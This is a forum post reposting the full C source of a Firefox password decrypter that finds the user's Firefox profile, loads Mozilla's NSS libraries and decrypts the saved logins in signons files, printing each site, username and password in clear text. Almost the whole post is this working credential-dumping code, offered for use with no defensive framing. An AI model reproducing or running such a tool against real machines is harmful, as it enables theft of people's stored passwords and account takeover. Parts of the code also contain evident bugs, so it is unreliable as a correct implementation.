Jump to content
Nytro

FF pass Decrypt

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

FF pass Decrypt

Firefox Password Decrypter by KriPpLer

//-----------------------------------------------------------------------

////////////////////////////////////////////////////////////
//  Description: Firefox Password Cache Decrypter			
//  Versions: Firefox 1, 2, and 3							
//  Author: KriPpLer										
//  Language: C												
//  Released: 9/9/2008										
//  URL: http://www.krippler.com/							
///////////////////////////////////////////////////////////
//  Credit: http://securityxploded.com/	(FF 2 Source)  
//  Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip
////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <userenv.h>
#pragma comment(lib,"userenv.lib")
//-----------------------------------------------------------------------

//Firefox internal SEC structures
typedef enum SECItemType
{
    siBuffer = 0,
    siClearDataBuffer = 1,
    siCipherDataBuffer = 2,
    siDERCertBuffer = 3,
    siEncodedCertBuffer = 4,
    siDERNameBuffer = 5,
    siEncodedNameBuffer = 6,
    siAsciiNameString = 7,
    siAsciiString = 8,
    siDEROID = 9,
    siUnsignedInteger = 10,
    siUTCTime = 11,
    siGeneralizedTime = 12
};

struct SECItem
{
    SECItemType type;
    unsigned char *data;
    unsigned int len;
};

typedef enum SECStatus
{
    SECWouldBlock = -2,
    SECFailure = -1,
    SECSuccess = 0
};
//-----------------------------------------------------------------------
//Removes gecko-sdk dependency
#define PRBool   int
#define PRUint32 unsigned int
#define PR_TRUE  1
#define PR_FALSE 0

//Mozilla library names
#define NSS_LIBRARY_NAME   "nss3.dll"
#define PLC_LIBRARY_NAME   "plc4.dll"
#define NSPR_LIBRARY_NAME  "nspr4.dll"
#define SQLITE_LIBRARY_NAME  "sqlite3.dll"
#define MOZCRT_LIBRARY_NAME  "mozcrt19.dll"
#define NSSU_LIBRARY_NAME  "nssutil3.dll"
#define NSSU_LIBRARY_NAME  "nssutil3.dll"
#define PLDS_LIBRARY_NAME  "plds4.dll"
#define SOFTN_LIBRARY_NAME "softokn3.dll"

#define LOADLIBRARY(x)  LoadLibrary(x)
#define GETPROCADDRESS  GetProcAddress
#define FREELIBRARY     FreeLibrary
//-----------------------------------------------------------------------
const int buflen = 10240;
static char readbuf[buflen+1];
static int last = 0;
static int next = 0;

typedef struct PK11SlotInfoStr PK11SlotInfo;

// NSS Library functions
typedef SECStatus      (*NSS_Init) (const char *configdir);
typedef SECStatus      (*NSS_Shutdown) (void);
typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void);
typedef void           (*PK11_FreeSlot) (PK11SlotInfo *slot);
typedef SECStatus      (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw);
typedef SECStatus      (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx);
typedef SECStatus      (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx);

// PLC Library functions
typedef char *         (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest);

// Function declarations..
void NSSUnload();
int InitFFLibs(char *firefoxPath);
int InitializeNSSLibrary(char *profilePath, char *password);
int CheckMasterPassword(char *password);
int DirectoryExists( char *path );
void StrLwr(char *str);
int OpenFile(char *filePath);
void CloseFile();
int ReadLine(char *buffer, int size);
char *GetFFProfilePath();
char *GetFFLibPath();
char *GetFFVersion();
char **Explode(char *StrIn,const char *Delimiter);
char *Split(char *String,char Delimeter[],int Part);
char *replace(char *str, const char *substr, const char *repstr);

char ReadChar();
char Vers[_MAX_PATH] = "";
int version = 1;

int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen);
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen);
//-----------------------------------------------------------------------
NSS_Init                NSSInit = NULL;
NSS_Shutdown            NSSShutdown = NULL;
PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL;
PK11_CheckUserPassword  PK11CheckUserPassword = NULL;
PK11_FreeSlot           PK11FreeSlot = NULL;
PK11_Authenticate       PK11Authenticate = NULL;
PK11SDR_Decrypt         PK11SDRDecrypt = NULL;
PL_Base64Decode         PLBase64Decode = NULL;

int IsNSSInitialized = 0;

HMODULE libnss = NULL;
HMODULE libplc = NULL;
HMODULE libtmp = NULL;

FILE *signonFile = NULL;

//-----------------------------------------------------------------------
int OpenFile(char *filePath)
{
	last = next = 0;
    signonFile = fopen(filePath, "r");

    if( signonFile == NULL )
    {
	  return 0; //fail
	}

  return 1;
}
//-----------------------------------------------------------------------
char ReadChar()
{

  if (next >= last)
  {
    next = 0;
    last = fread(readbuf, 1, buflen, signonFile);
    if (last <= 0 )
    {
	 return 0;
    }
  }

  return (readbuf[next++]);
}
//-----------------------------------------------------------------------
int ReadLine(char *buffer, int size)
{
  unsigned int c;
  int strLength = 0, i=0;

  buffer[0] = 0;

  while(1)
  {
      c = ReadChar(); 

	  // eof reached
	  if ( c == 0 ) // || feof(file) )
		  return 0;

	  if (c == '\n')
      {
          buffer[strLength++] = 0;
          break;
	  }

      if (c != '\r')
	  {
          for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++)
          {
              if( strLength >= size )
              {

				  printf("\n Buffer is insufficient to store data");
				  return 0;
			  }
			  // Increase buffer capacity dynamically
              buffer[strLength++] = (char)c;
              c = c >> 8;
		  }
	  }
  }

  return 1;

}
//-----------------------------------------------------------------------
//Misc functions
int DirectoryExists( char *path )
{
    DWORD attr = GetFileAttributes(path);
	if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) )
	{
		return 0;
    }
    return 1;
}
//-----------------------------------------------------------------------
void StrLwr(char *str)
{
int n=strlen(str);
	for(int i=0; i<n; i++)
	{
		if( str[i] >=65 && str[i]<=90 )
		str[i]+=32;
	}
}
//-----------------------------------------------------------------------
//Loads specified firefox library with the given ffdir path as root
HMODULE LoadLibrary(char *firefoxDir, char *libName)
{
char loadPath[4096]="";

    strcpy(loadPath, firefoxDir);
    strcat(loadPath, "/");
    strcat(loadPath, libName);

    libtmp = LOADLIBRARY(loadPath);

    if( !libtmp )
    {
		return 0; //Failed to load library
    }

    return libtmp;
}
//-----------------------------------------------------------------------
int InitFFLibs(char *FFDir)
{
    libnss = libplc = NULL;

	//Load all required dll's
  if( FFDir != NULL )
  {

	//Minor version check
	if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower
	{
		goto version2; 
	} else {
if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
{
	if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
	{
		if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) )
		{
				 if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) )
				 {

					if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) )
						{

						}
				 }
		   }
	  }
   }
}		
version2:

            if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
			{
                if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
				{
					if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
                    {
								if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
								{
                                    if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) )
                                    {
                                            libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME);
                                            if(libnss )
                                                printf("\n\n Librarys loaded from master firefox path successfully");
                                    }
                                }

					}
				}
			}
	}

    // Now load from current path.
    if( !libnss )
	{
        libnss =LOADLIBRARY(NSS_LIBRARY_NAME);
		libplc =LOADLIBRARY(PLC_LIBRARY_NAME);
        if( !libnss || !libplc )
		{
            printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME);
			return 0;
        }
	} else {
	printf("\n Firefox Libraries loaded successfully");
	}

    // Extract the required functions....
    NSSInit                   = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init");
    NSSShutdown               = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown");
    PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot");
    PK11FreeSlot           = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot");
    PK11Authenticate       = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate");
    PK11SDRDecrypt         = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt");
    PK11CheckUserPassword  = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword");

    if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword)
    {
		printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME);
		NSSUnload();
        return 0;
    }

	// Get the functions from PLC library
	PLBase64Decode     = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode");

	if( !PLBase64Decode )
	{
        printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME);
		NSSUnload();
        return 0;
	} else {
	printf("\n Firefox library initialized successfully");
	}

  return 1;
}
//-----------------------------------------------------------------------
int InitializeNSSLibrary(char *profilePath)
{
	IsNSSInitialized = 0;

    // Initialize the NSS library
    if( (*NSSInit) (profilePath) != SECSuccess )
	{
        printf("\n\n NSSLib Initialization failed");
		NSSUnload();
		return 0;
	} else {
	IsNSSInitialized = 1;
	printf("\n NSS library initiliazed successfully");
	}

  return 1;
}
//-----------------------------------------------------------------------
void NSSUnload()
{
    if( IsNSSInitialized  && (NSSShutdown != NULL) )
        (*NSSShutdown)();

    if( libnss != NULL )
		FREELIBRARY(libnss);  //Free nss library

    if( libplc != NULL )
		FREELIBRARY(libplc);  //Free plc library
}
//-----------------------------------------------------------------------
int DecryptStr(char *cryptData, char **clearData)
{
int decodeLen = 0;
int finalLen = 0;
char *decodeData = NULL;
char *finalData = NULL;

	if( cryptData[0] != NULL )
	{
		if(  (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) )
        {
			return 0;
		}

		// Do the actual PK11 decryption
        if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL))
		{
			return 0;
		}

		*clearData = (char*) malloc( finalLen + 1 );
        if( *clearData == NULL )
        {
			printf("\n Insufficient memory");
			return 0;
		}
        memcpy(*clearData, finalData, finalLen);
		*(*clearData + finalLen) = 0;    // Null terminate string

		return 1;
	}

	if(  Base64Decode(cryptData, clearData, &decodeLen) == 0 )
	{
		return 0;
	}

	return 1;
}
//-----------------------------------------------------------------------
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen)
{
    int len = strlen( cryptData );
    int adjust = 0;

    if (cryptData[len-1] == '=')
    {
      adjust++;
      if (cryptData[len-2] == '=')
		  adjust++;
    }

    *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL);

	if( *decodeData == NULL )
	{
		return 0;
    }

    *decodeLen = (len*3)/4 - adjust;

    return 1;
}
//-----------------------------------------------------------------------
int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen)
{
    PK11SlotInfo *slot = 0;
    SECStatus status;
    SECItem request;
    SECItem reply;

    // Find token with SDR key
    slot = (*PK11GetInternalKeySlot)();

    if (!slot)
    {
		return 0;
	}

	// Decrypt the string
    request.data = (unsigned char *)decodeData;
    request.len = decodeLen;
    reply.data = 0;
	reply.len = 0;

    status = (*PK11SDRDecrypt)(&request, &reply, NULL);

    if (status != SECSuccess)
	{
		return 0;
	}

    *clearData = (char*)reply.data;
    *finalLen  = reply.len;

	// Free the slot
	(*PK11FreeSlot)(slot);
	return 1;
}
//-----------------------------------------------------------------------
int DumpCache(char *profilePath,char *signonFile)
{
char buffer[10240];
char sbuffer[10240];
char name[10240];

char *clearData = NULL;

int bufferLength = 10240;
int count = 0;
int ret;

	if( profilePath == NULL || signonFile == NULL)
	{
		return 0;
	}

	strcpy(sbuffer,profilePath);
	strcat(sbuffer,"\\");
	strcat(sbuffer,signonFile);

	if(OpenFile(sbuffer) == 0 ) // Open the signon file
	 {
		 printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile);
		 return 0;
	 } else {
	printf("\n\n ============================================================== ");
	printf("\n =                        %s                        = ",signonFile);
	printf("\n ============================================================== ");

	/*/////////////////////////////////////////
	  Begin cache dump
	*//////////////////////////////////////////

	printf("\n\n ======================= Unmanaged URLS ======================= ");

	// Read out the unmanaged ("Never remember" URL list

	ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag

	while (ReadLine(buffer, bufferLength) != 0)
	{
		// End of unmanaged list
		if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
			break;
		printf("\n %s ", buffer);
	}
	printf("\n ======================== Managed URLS ========================\n");

	// read the URL line
while (ReadLine(buffer, bufferLength) != 0 ){

 printf("\n URL: %s ", buffer);

	//Start looping through final singon*.txt file
 while (ReadLine(buffer, bufferLength) != 0 )
 {

	if (buffer[0] == '.')
	{
	printf("\n ==============================================================\n");
	break; // end of cache entry
	}

	//Check if its a password
	if (buffer[0] == '*')
	{
		strcpy(name,&buffer[1]);
		ret = ReadLine(buffer, bufferLength);
	} else {
		printf("\n");
		strcpy(name, buffer);
		ret = ReadLine(buffer, bufferLength);
	}

	if( DecryptStr(buffer, &clearData) == 1 )
	{
				printf("\n %s: %s ", name, clearData);
				clearData = NULL;
	}
  }
}
	printf("\n\n ============================================================== ");
	printf("\n =                       END %s                     = ",signonFile);
	printf("\n ============================================================== \n");

return 1;
}
	/*/////////////////////////////////////////
	  End pcache dump
	*//////////////////////////////////////////
}
//-----------------------------------------------------------------------
// Find firefox path / libraries
char *GetFFLibPath()
{
	char regSubKey[]    = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
	char path[_MAX_PATH] ="";
	char *FFDir = NULL;
	DWORD pathSize = _MAX_PATH;
	DWORD valueType;
	HKEY rkey;

	// Open firefox registry key
	if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
	{
		printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
		return NULL;
    }

	// Read the firefox path
	if( RegQueryValueEx(rkey, NULL, 0,  &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
	{
        printf("\n Failed to read the firefox path value from registry ");
        RegCloseKey(rkey);
        return NULL;
    }

    if( pathSize <= 0 || path[0] == 0)
	{
		printf("\n Unable to locate firefox installation path");
		RegCloseKey(rkey);
		return NULL;
	}

	RegCloseKey(rkey);

	// Remove extra quotes
	if( path[0] == '\"' )
	{
		for(int i=0; i < strlen(path)-1 ; i++)
            path[i] = path[i+1];
	}

	printf("\n Firefox main exe: %s", path);

	// Terminate the string at last "\\"
	for(int j=strlen(path)-1; j>0; j--)
	{
        if( path[j] == '\\' )
		{
			path[j]=0;
			break;
        }
	}

	FFDir = (char*) malloc( strlen(path) + 1);

		if(FFDir)
			strcpy(FFDir, path);
		printf("\n Firefox path: %s", FFDir);

 return FFDir;
}
//-----------------------------------------------------------------------
char *GetFFProfilePath()
{
char profilePath[_MAX_PATH] = "";
char partialPath[] = "Application Data\\Mozilla\\Firefox";
char profileFile[_MAX_PATH];
char line[1024];

DWORD pathSize = _MAX_PATH;
char *finalProfilePath = NULL;
int  isDefaultFound = 0;
HANDLE token;

    // Get current user's profile directory
    if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE )
    {
        printf("\n Failed to get current process token ");
		return NULL;
    }

    if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE )
	{
		printf("\n Failed to get user profile directory");
        return NULL;
    }

	printf("\n User Profile directory: %s\n", profilePath);

    // Get firefox profile directory
    strcpy(profileFile, profilePath);
    strcat(profileFile,"\\");
    strcat(profileFile,partialPath);
	strcat(profileFile,"\\profiles.ini");

	// Open the firefox profile setting file
    FILE *profile = fopen(profileFile, "r");

	if( profile == NULL )
    {
		printf("\n Unable to find firefox profile file: %s ", profileFile);
        return NULL;
    }

	// This indicates that we are looking under default profile
	while(fgets(line, 1024, profile))
	{
		StrLwr(line);

        if( !isDefaultFound && ( strstr(line, "name=default") != NULL) )
		{
            isDefaultFound = 1;
            continue;
		}

		// Found default profile / check for path
		if( isDefaultFound )
		{
			if( strstr(line,"path=") != NULL)
			{
				char *slash = strstr(line,"/");

                if( slash != NULL )
                    *slash = '\\';

				// remove \n from the end of line
                line[strlen(line)-1] = 0;

                char *start = strstr(line,"=");

				int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ;
				finalProfilePath = (char *) malloc(totalLen);

                if( finalProfilePath )
                {
					strcpy(finalProfilePath,profilePath);
                    strcat(finalProfilePath,"\\");
                    strcat(finalProfilePath,partialPath);
                    strcat(finalProfilePath,"\\");
                    strcat(finalProfilePath,start+1);

					printf("\n Final profile path: %s \n", finalProfilePath);
                }

				break;
			}
        }

    }

	fclose(profile);

  return finalProfilePath;
}
//-----------------------------------------------------------------------
char *GetFFVersion()
{
char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox";
char *FFVers = NULL;
DWORD pathSize = _MAX_PATH;
DWORD valueType;
HKEY rkey;

    // Open firefox registry key
	if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
    {
        printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
		return NULL;
	}


    // Read the firefox path value
    if( RegQueryValueEx(rkey, "CurrentVersion", 0,  &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS )
	{
        printf("\n Failed to read the firefox version from registry ");
        RegCloseKey(rkey);
		return NULL;
    }

		if( pathSize <= 0 || Vers[0] == 0)
    {
		printf("\n Path value read from the registry is empty");
		RegCloseKey(rkey);
        return NULL;
    }   

		RegCloseKey(rkey);

		FFVers = (char*) malloc( strlen(Vers) + 1);

    if( FFVers )
	strcpy(Vers,FFVers);
	if (FFVers[1] == '1')
	{
		version = 1;
	}else{
	if (FFVers[1] == '2')
	{
		version = 2;
	}else{
	if (FFVers[1] == '3')
		{
		version = 3;	
	}
  }
} 
	printf("\n Firefox version: %d", version);

	return (FFVers);
}
//-----------------------------------------------------------------------
int main(int argc, char* argv[])
{
	char *ProfilePath = NULL; 	//Profile path
	char *FFDir = NULL;   		//Firefox main installation path
	char buff[1024];

	ProfilePath = GetFFProfilePath();

	if( !DirectoryExists(ProfilePath))
	{
      printf("\n\n Firefox profile directory does not exist or no profiles found. \n");
	  return 0;
	}

	FFDir = GetFFLibPath();

	if( !DirectoryExists(ProfilePath))
	{
      printf("\n\n Firefox installation path does not exist or is not installed. \n");
	  return 0;
	}
		if( InitFFLibs(FFDir) )
		{
			if( InitializeNSSLibrary(ProfilePath) )
			{
				 //Take 3 Mozilla dumps
				DumpCache(ProfilePath,"signons.txt");   
				DumpCache(ProfilePath,"signons2.txt");
				DumpCache(ProfilePath,"signons3.txt");
				//DumpCache(ProfilePath,"signons.sqlite");
				//Dont forget to flush :/
				NSSUnload();
			}
		}

	printf("\n ======================= End Cache Dump =======================\n");

	while(1){
	Sleep(10000);  //Just loop until user exits
	}

}
//-----------------------------------------------------------------------

Sursa: LeetCoders

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...